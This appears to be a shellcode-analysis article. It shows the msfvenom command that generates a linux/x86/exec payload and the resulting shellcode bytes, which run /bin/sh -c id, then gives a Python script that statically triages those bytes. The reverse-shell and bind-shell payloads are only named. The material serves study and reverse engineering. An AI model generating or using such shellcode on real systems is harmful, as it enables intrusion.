Msfvenom Shellcode Analysis
Today I will analyze the following shellcode payloads generated by msfvenom, specifically for linux/x86:
- linux/x86/exec — Execute an arbitrary command
- linux/x86/shell_bind_tcp — Listen for a connection and spawn a command shell
- linux/x86/shell_reverse_tcp — Connect back to attacker and spawn a command shell
1) linux/x86/exec
This msfvenom payload executes an arbitrary command that you specify while creating the payload. Let's create the payload with the Linux command id.
# msfvenom -p linux/x86/exec CMD=id -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69"
"\x64\x00\x57\x53\x89\xe1\xcd\x80";
Then, we will use ndisasm, the Netwide Disassembler, to disassemble the created shellcode.
# echo -ne…
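The bytes that echo -ne pipes into ndisasm can also be triaged statically before any disassembly, which is a useful habit when the payload arrives as a dump rather than as a known msfvenom module. The script below is an added example, not code from the original article or from the Metasploit project: it parses the msfvenom -f c output shown above back into raw bytes and reports the facts an analyst wants first, namely the size, the offsets of null bytes, the syscall number loaded with the push/pop idiom, the strings built on the stack with push immediates, and the inline data that the call instruction jumps over. The function names and the byte-pattern approach are my own choices; the only syscall number in the table is the real i386 value for execve, and the sample input is the article's own dump embedded as a constant.

```python
"""Static triage of an msfvenom `-f c` shellcode dump (added example).

Converts the C array that msfvenom prints into the same raw bytes that
`echo -ne` feeds to ndisasm, then extracts the facts an analyst wants
before opening a disassembler.
"""
import re
import struct

# Constructed sample input: the linux/x86/exec dump from the article, pasted verbatim.
MSFVENOM_C_OUTPUT = r'''
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x69"
"\x64\x00\x57\x53\x89\xe1\xcd\x80";
'''

# 32-bit Linux syscall numbers (i386 ABI); extend as other payloads are analysed.
SYSCALLS_I386 = {11: "execve"}


def parse_c_array(text: str) -> bytes:
    """Turn the "\\x6a\\x0b..." string literals of a msfvenom -f c dump into bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def null_byte_offsets(code: bytes) -> list:
    """Offsets of 0x00 bytes; a C-string copy would truncate at the first one."""
    return [i for i, b in enumerate(code) if b == 0]


def syscall_setup(code: bytes):
    """Detect the `push imm8 ; pop eax` idiom (6a xx 58) that loads a syscall
    number in three bytes, and whether an `int 0x80` (cd 80) follows it."""
    m = re.search(rb"\x6a(.)\x58", code, re.DOTALL)
    if not m:
        return None
    number = m.group(1)[0]
    return {"eax": number,
            "name": SYSCALLS_I386.get(number, "unknown"),
            "int80_present": b"\xcd\x80" in code[m.end():]}


def push_string_groups(code: bytes) -> list:
    """Pattern-scan for `push imm32` (68 xx xx xx xx) and `push imm16`
    (66 68 xx xx). Consecutive pushes build one string on the stack with the
    last push at the lowest address, so each run is joined in reverse order.
    This is a byte-pattern match, not a disassembly: a 0x68 inside another
    instruction's operand would be a false positive, so the offset of each
    run is returned for cross-checking against the ndisasm listing."""
    groups, run, i = [], [], 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            run.append((i, code[i + 1:i + 5]))
            i += 5
        elif code[i:i + 2] == b"\x66\x68" and i + 4 <= len(code):
            run.append((i, code[i + 2:i + 4]))
            i += 4
        else:
            if run:
                groups.append(run)
                run = []
            i += 1
    if run:
        groups.append(run)
    return [(r[0][0], b"".join(imm for _, imm in reversed(r))) for r in groups]


def call_over_data(code: bytes) -> list:
    """A forward `call` (e8 rel32) whose target stays inside the blob skips
    over inline data while pushing that data's address as the return address;
    msfvenom's exec payload stores the command string this way. Returns
    (offset, skipped bytes) for each such call."""
    found = []
    for i in range(len(code) - 4):
        if code[i] == 0xE8:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            data_start, target = i + 5, i + 5 + rel
            if rel > 0 and target <= len(code):
                found.append((i, code[data_start:target]))
    return found


def triage(text: str) -> dict:
    """Full report for one msfvenom -f c dump."""
    code = parse_c_array(text)
    as_text = lambda b: b.rstrip(b"\x00").decode("latin-1")
    return {
        "size": len(code),
        "null_offsets": null_byte_offsets(code),
        "syscall": syscall_setup(code),
        "stack_strings": [(off, as_text(s)) for off, s in push_string_groups(code)],
        "inline_data": [(off, as_text(d)) for off, d in call_over_data(code)],
    }


if __name__ == "__main__":
    for key, value in triage(MSFVENOM_C_OUTPUT).items():
        print(f"{key}: {value}")
    # Raw bytes for `ndisasm -b 32 exec_shellcode.bin`, the same input the
    # article produces with echo -ne.
    with open("exec_shellcode.bin", "wb") as f:
        f.write(parse_c_array(MSFVENOM_C_OUTPUT))
```

For the 38-byte dump above the report shows eax loaded with 11 (execve) followed by int 0x80, the stack strings "-c" and "/bin/sh", and the inline data "id" after the call at offset 24, which is the execve("/bin/sh", ["/bin/sh", "-c", "id"]) shape that the disassembly then confirms instruction by instruction. Writing the bytes to a file and running ndisasm -b 32 on it gives the same listing as the echo -ne pipeline.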